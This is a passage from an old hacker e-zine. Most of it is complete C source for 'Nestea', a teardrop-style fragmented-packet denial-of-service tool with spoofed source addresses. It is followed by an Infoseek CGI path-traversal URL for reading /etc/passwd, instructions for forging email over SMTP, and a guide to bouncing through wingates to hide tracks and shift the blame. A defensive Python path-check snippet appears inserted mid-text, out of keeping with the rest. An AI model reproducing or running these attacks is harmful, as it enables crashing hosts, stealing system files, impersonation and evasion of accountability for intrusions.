                        to be safe, we should hit them till they die :>  */

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;


    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    for (i = 0; i < PADDING; i++)
    {
        p_ptr[i++] = random() % 255;
    }

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}
       
     (11)------------SECURITY--------------------------------------(11)
 


 [Infoseek]-------------------------------------| optiklenz | 

http://www.infoseek.com/cgi/bin?/./view?/home/path

Alternate bin with etc (etc, etc), and you will
receive the /etc/ directory structure, which contains
the passwd file.

The above exploits a discrete flaw in Infoseek's CGI.  It can be used
to view various binaries and commands.  If you are viewing
it with a Netscape browser, keep reloading; the document output
will change the binary data.  If you are using lynx you should receive
the command binary and a directory structure.....

/bin/

For Example:

http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd

in lynx will list the
directory structure for the etc directory,
i.e. /etc/

resolv.conf .. passwd

If you use lynx you will be able to grab the .passwd file.
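The flaw above is a CGI that hands a client-supplied path straight to the filesystem. As an added example (not Infoseek's code, which the page does not show), here is the confinement check such a handler needs: the parameter is mapped under a document root and anything that normalizes outside it is refused. The docroot /srv/www, the function name and the probe strings are assumptions.

```python
import posixpath

def resolve_requested_path(docroot, requested):
    """Map a client-supplied path parameter onto docroot, or return None when it escapes.
    Works on the path string only (posixpath), so it does not follow symlinks; a real
    handler should also realpath() the result before opening it."""
    if "\0" in requested:            # an embedded NUL would truncate the name in C code
        return None
    root = posixpath.normpath(docroot)
    # Treat the parameter as relative to docroot, whatever leading slashes the client sent
    joined = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    # After normalization every "." and ".." is resolved; anything outside root is rejected
    if joined != root and not joined.startswith(root + "/"):
        return None
    return joined

# Constructed probes in the shape of the URL parameter above; none is real Infoseek traffic
PROBES = ["/./view?/home/path", "bin/../../etc/passwd", "/etc/passwd", "a/./b/../c", "x\0y"]

if __name__ == "__main__":
    for p in PROBES:
        print("%-22r -> %s" % (p, resolve_requested_path("/srv/www", p)))
```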

     (12)------------SECURITY--------------------------------------(12)
 
  
 [Mail Forge]-------------------------------------| optiklenz | 

  I wrote about this years ago, and decided to revise it.

  This exploits SMTP (port 25), allowing you to forge email
  from a remote host.
  
  Unix/Linux Users Use:

  $ open url.host.net
   
  Windows Users Use:

  c:\windows\telnet <--

    Enter url.host.net as the host to connect to, and 25 as the port.
 
   After connected:

  220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at Label,
  day month/day/year
  3 -0400 (EDT)  

    If it prompts with "It's always polite to helo", use the helo command.

    mail rcpt to user@domain.net                | Variables        |
          next                                  [ helo = call send ]
    mail rcpt from fake@faked.net               [ rcpt = recipient ]
                                                [ vrfy = verify    ]


     vrfy comes into play if things don't seem to be going right.
     For verify it is good to know the uids of people who use the system
     you're forging from.  Use: vrfy uid (user id)

     Then type "Data", and press enter.
     The first thing you'll type in is a title.  Next is the body of the message.
     Both should be on separate lines. Once finished, type --> a . <--
     then type quit, and press enter.
 (13)------------SECURITY--------------------------------------(13)
 
  
 [Wingate]-------------------------------------| optiklenz | 

  Short preface on wingating and its purposes.  One is able to use
  an exploit in certain systems to bounce from one host to another.
  A wingate can be used for a system's benefit or its downfall. One
  way it can be used is as a firewall to protect your host from outside
  attacks. Another use is bouncing from one host to another to
  cover your tracks. This puts the blame on the system you wingated
  from.

  Unix/Linux  Usage:

  $ telnet wingate.net
  
  Windows Usage:
 
   Run a telnet client and connect to a wingate address via port 23.
   Once prompted with     "  Wingate: "   you then enter the location
   you want to bounce to.  If using the wingate method to test your
   system's logging, it is good to bounce from more than 1 wingate at a
   time.

   Using Wingate as  a socks host on IRC:

   Linux Use: /server <wingate>:23  /quote <irc server>:6667

   Windows use:  Enter wingate location in your irc client's
                 "FIREWALL/SOCKS HOST" query.

[Some Wingates For your Proxy Pleasure]

 (14)------------SECURITY--------------------------------------(14)